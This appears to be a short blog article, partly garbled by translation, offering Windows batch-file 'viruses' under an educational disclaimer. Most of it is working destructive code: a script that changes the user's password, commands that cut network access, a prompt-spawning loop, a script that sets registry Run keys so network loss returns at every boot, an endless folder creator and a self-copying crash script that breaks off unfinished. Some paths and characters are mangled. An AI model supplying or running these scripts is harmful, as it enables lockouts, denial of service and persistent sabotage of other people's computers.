cover coding shell
1–2 minutes

Virus in BAT format

Welcome to this new article in which I will show you some of the most dangerous viruses created directly from our known block, I will also provide you codes to create these viruses obviously for test purposes, before starting some important recommendations! !

I assume no responsibility for the use of this article as the only purpose is the informative and educational one, all the consequences caused by the use of this article will be your only responsibility.

All viruses are in size . ♪, then in the note block you will have to save as(example) ” virus. ♪ ”

Change username.

@echo off
net user %username% InShadow

Set the time at 00:00.

@echo off
time 00:00

Disable the internet.

ipconfig /release
if ERRORLEVEL1 ipconfig /release_all

Loop prompt

Start and the command Windows assumes to run the Command Prompt. Then the more Start you can write multiple prompts will be opened in a row so that the Pc will be stacked.

: infinitedos 
 @start 
 @echo addio… 
 @start 
 @Goto infinitedos

Disable the Internet permanently.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /dc:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /dc:windowswimn32.bat /f
echo Sei stato hackerato!
PAUSE

How to create more than 1,000 folders in less than a minute.

@echo off
:top
md %random%
GOTO top

Crash in 3 seconds.

for /l %%i in (1,1,10000) do (
 md %%i
 cd %%i
 copy "..\bat.bat"
 for /l %%i in (1,1,5) do (
  start bat.bat
 )
 cd..
 for /l %%i in (1,1,5) do (
  echo %random% %random% %random% %random% %random% %random% %random% %random% %random%
EnglishenEnglishEnglish